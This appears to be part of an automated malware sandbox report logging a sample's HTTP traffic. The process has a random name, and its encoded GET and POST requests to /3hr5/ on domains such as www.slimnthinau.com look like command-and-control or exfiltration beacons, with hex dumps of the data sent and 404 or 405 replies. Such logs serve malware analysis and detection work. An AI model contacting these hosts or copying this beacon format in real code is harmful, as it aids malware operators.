32 4b 72 5a 41 4b 57 78 46 75 31 33 70 69 56 30 63 6d 4c 37 2f 4b 6f 4c 44 33 43 4e 59 59 76 4a 77 68 56 56 48 76 30 54 57 6c 31 59 74 30 63 4a 66 35 51 4f 6a 6d 6f 75 71 47 68 44 34 35 51 6a 63 52 33 73 74 64 71 65 41 38 33 6b 71 31 37 39 58 65 53 6a 43 4b 2b 75 53 41 69 66 4a 50 6e 44 74 6a 44 46 31 7a 74 6e 33 6e 50 56 4e 30 62 43 73 54 43 38 63 47 51 48 76 30 2b 52 4d 6d 70 30 69 78 33 4b 7a 33 76 4d 67 4f 79 4c 63 7a 71 63 49 68 31 72 6a 6c 45 48 64 39 33 2b 41 61 6d 73 44 68 61 34 32 46 4a 55 78 78 58 4f 69 67 32 2b 6c 56 37 30 66 4e 6b 74 70 43 33 7a 63 43 2f 71 58 7a 53 54 73 6e 4c 4c 59 2f 48 55 49 64 45 52 70 6e 61 4a 7a 39 52 64 6b 75 64 62 71 64 31 6b 77 51 58 57 4a 6b 4a 38 75 46 78 50 4e 6b 37 48 55 6d 42 49 70 4b 34 54 32 35 44 47 77 78 54 4d 44 68 5a 30 74 35 71 30 76 46 32 6f 49 2f 7a 69 74
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:24:13.142080069 CET2626OUTData Raw: 5a 6a 51 6a 65 6f 6f 57 46 6e 43 47 58 66 2b 56 2f 66 42 75 74 6a 2f 64 44 35 53 75 71 43 58 46 71 30 63 67 6b 6e 72 49 77 49 57 43 42 71 35 78 4b 42 64 65 62 6f 6e 62 2f 54 54 65 61 34 74 37 7a 72 68 65 43 5a 42 74 65 38 50 6b 58 50 55 58 51 32
                                                                                                                              Data Ascii: ZjQjeooWFnCGXf+V/fButj/dD5SuqCXFq0cgknrIwIWCBq5xKBdebonb/TTea4t7zrheCZBte8PkXPUXQ2/Ujx0msi8EUPP7j7Qm4FGw9avtmotk8vO8yr+N32aImrdAg0Y/Rxo1FrUywUh6dqxq8oisqXz3fOvOb+WQ/FVdZ9YpJIhi6FZSSFufWPzEqTCNCoJNgWnsVY9QdA3NrAUBqLsKjl5BxLEvFA5QKxmPwKByau/Ly7m
                                                                                                                              Dec 4, 2023 15:24:13.142205000 CET2626OUTData Raw: 62 30 4d 49 33 34 69 57 46 39 5a 5a 44 51 35 78 70 54 38 31 32 54 54 51 51 71 49 4f 55 63 77 38 59 43 34 4d 75 35 50 37 46 74 5a 32 33 4a 42 63 4e 38 57 7a 48 50 50 31 2b 41 52 70 77 59 39 44 6c 58 6d 6b 68 64 65 65 76 68 73 6c 41 4b 36 37 43 61
                                                                                                                              Data Ascii: b0MI34iWF9ZZDQ5xpT812TTQQqIOUcw8YC4Mu5P7FtZ23JBcN8WzHPP1+ARpwY9DlXmkhdeevhslAK67CabSJmBoEn/OMw5kMGY1yktP0Q2+GvK7JMD8jCUVFP9CMWo0MOsbsIW0tjGrofwzXXiadW3C/iKN00hX0SKUBoT7AiemSL1akPQfNU0Gl2liDz3JaNQz784EYKxtQ+jRtWYIpC4dEZYG0hLuSBNDxRHctq5CEB5VVVc
                                                                                                                              Dec 4, 2023 15:24:13.142210960 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:24:13 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                                                                                                                              Dec 4, 2023 15:24:13.142396927 CET7770OUTData Raw: 35 70 71 39 49 65 36 4e 70 44 4a 39 74 2b 4d 42 71 38 65 41 42 74 4e 6e 4f 73 79 39 75 33 61 68 6f 4c 71 77 61 45 76 73 6e 46 56 32 41 4e 47 55 66 36 69 4f 78 35 6b 44 32 37 55 36 31 30 4c 7a 34 58 64 68 46 62 7a 49 70 7a 30 76 55 64 46 48 50 54
                                                                                                                              Data Ascii: 5pq9Ie6NpDJ9t+MBq8eABtNnOsy9u3ahoLqwaEvsnFV2ANGUf6iOx5kD27U610Lz4XdhFbzIpz0vUdFHPTqlfYYzR5lgQxRFNmMzo1flSAkPXZHb0fCrs3iawPn5kIT+Op8X67wZQd07IXoWoed0gUlTHeCxlQG1qspeGOJNBiWXTSD4qwZ97hP4ikUh5+m5BvR/azrLPXAME6e3QxoQ4ppNY4N4v7K3zrIGE9Uopq0CT6weulg
                                                                                                                              Dec 4, 2023 15:24:13.142651081 CET5198OUTData Raw: 6b 5a 41 74 4f 70 4c 7a 4f 38 32 77 6b 79 47 7a 31 38 68 55 34 6e 42 44 47 4b 54 4b 41 39 45 59 77 68 67 46 71 30 55 76 63 63 42 41 4c 6c 43 76 30 34 6f 34 6d 75 52 51 68 2b 39 31 54 75 69 61 4e 58 52 4c 66 53 32 45 31 36 51 74 46 71 67 46 47 6c
                                                                                                                              Data Ascii: kZAtOpLzO82wkyGz18hU4nBDGKTKA9EYwhgFq0UvccBALlCv04o4muRQh+91TuiaNXRLfS2E16QtFqgFGlT2RdmriVWAdNhro0WXUrkFVh5L9z7HJhQp4mePJDsOIazDw0Qex6Mvi84nZ5itudTX2vhCUwzhjJV+pPHvyIBAAIv0GIsi1rkoH8JChOUOa509MUsZwGAed7b186QG4TXdU4xWDlp6c8VYZvJnpAItbvfCI4s8avP


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.11.2050155198.252.98.64808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:15.660726070 CET541OUTGET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:15.828353882 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:24:15 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.11.205015691.195.240.117808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:21.233376980 CET810OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 70 75 61 30 74 54 44 30 58 46 65 50 42 67 61 7a 6b 39 77 75 67 39 79 74 31 38 39 63 6e 71 4d 78 70 5a 7a 67 5a 2b 6a 62 66 42 4d 2f 58 6c 52 6a 62 62 4a 55 46 54 62 4b 69 50 46 72 30 2f 52 67 71 62 68 55 59 4f 48 63 57 76 59 32 63 45 54 72 36 78 7a 6e 73 61 75 71 76 4c 32 66 31 75 62 61 64 35 63 6b 78 73 49 48 4d 33 61 64 75 7a 4f 62 6c 41 68 73 57 2f 6a 6c 64 41 54 74 47 47 4b 46 54 35 4d 6f 50 44 71 7a 68 35 55 47 78 4c 72 79 70 58 30 32 4e 4e 49 55 4a 73 44 5a 66 6e 35 46 55 48 30 46 66 4f 36 36 78 47 74 45 36 78 4b 49 48 51 3d 3d
                                                                                                                              Data Ascii: TZd=pua0tTD0XFePBgazk9wug9yt189cnqMxpZzgZ+jbfBM/XlRjbbJUFTbKiPFr0/RgqbhUYOHcWvY2cETr6xznsauqvL2f1ubad5ckxsIHM3aduzOblAhsW/jldATtGGKFT5MoPDqzh5UGxLrypX02NNIUJsDZfn5FUH0FfO66xGtE6xKIHQ==
                                                                                                                              Dec 4, 2023 15:24:21.417294979 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:24:21 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.11.205015791.195.240.117808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:23.940310001 CET1150OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 70 75 61 30 74 54 44 30 58 46 65 50 41 42 71 7a 6f 2b 59 75 6d 64 79 69 77 38 39 63 79 36 4d 71 70 5a 2f 67 5a 37 44 31 66 79 34 2f 5a 6e 5a 6a 59 5a 68 55 45 54 62 4b 36 66 46 71 70 50 52 37 71 62 6c 63 59 50 72 63 57 76 63 32 65 79 48 72 71 52 7a 67 30 4b 75 31 6e 72 32 61 78 75 62 4d 64 35 41 43 78 74 63 48 4d 45 4f 64 76 33 32 62 6e 6c 64 74 42 66 6a 6e 4d 51 54 75 49 6d 4b 48 54 2b 45 67 50 43 53 38 68 4c 49 47 77 72 4c 79 6f 58 30 78 61 74 49 66 52 73 43 58 58 33 38 56 53 6d 6f 36 43 2b 75 6e 32 53 59 41 33 67 37 52 5a 67 66 41 30 4d 5a 57 72 38 6a 55 68 33 54 55 66 71 43 4a 61 46 54 47 56 65 53 70 6d 70 68 2f 33 4b 4d 75 61 45 41 57 6e 69 67 52 51 69 77 68 6d 67 4d 46 59 6b 59 5a 46 36 37 67 4b 4e 75 4b 71 79 61 5a 64 35 75 4b 66 4c 42 6f 45 75 44 58 33 36 50 5a 62 79 71 32 79 4e 6e 72 46 6a 49 33 6f 30 5a 66 47 4c 46 46 6a 42 30 4c 30 47 42 47 49 76 57 70 53 6e 41 6d 5a 45 6a 75 71 72 43 4a 55 33 32 43 35 52 64 51 68 2f 2b 55 4b 77 76 30 4d 73 68 42 41 68 6b 4a 69 70 63 39 38 75 55 52 6a 47 67 6c 31 71 45 53 30 57 68 4e 38 67 6f 4a 58 37 4b 68 76 2f 55 6a 34 72 6b 4e 45 43 66 55 36 35 43 76 4a 70 52 75 6a 6a 59 38 6e 4b 54 78 38 42 44 2f 58 32 6f 76 41 36 4a 59 37 4f 49 4b 4d 78 57 73 36 36 50 4b 77 76 2b 30 70 47 71 59 6d 4c 2f 71 42 6c 72 67 58 73 6c 75 70 2b 39 7a 61 54 56 7a 51 30 2f 34 31 58 4a 31 4e 65 5a 43 6d 78 4f 6a 6c 47 73 47 66 76 35 57 66 4c 4a 46 59 4f 30 67 4b 67 5a 74 6b 4d 49 68 54 39 35 43 33 6b 50 76 61 2f 42 54 66 79 32 74 4a 74 57 54 48 68 38 69 72 44 67 38 66 67 65 37 55 2f 52 75 67 6e 43 30 6d 74 59 3d
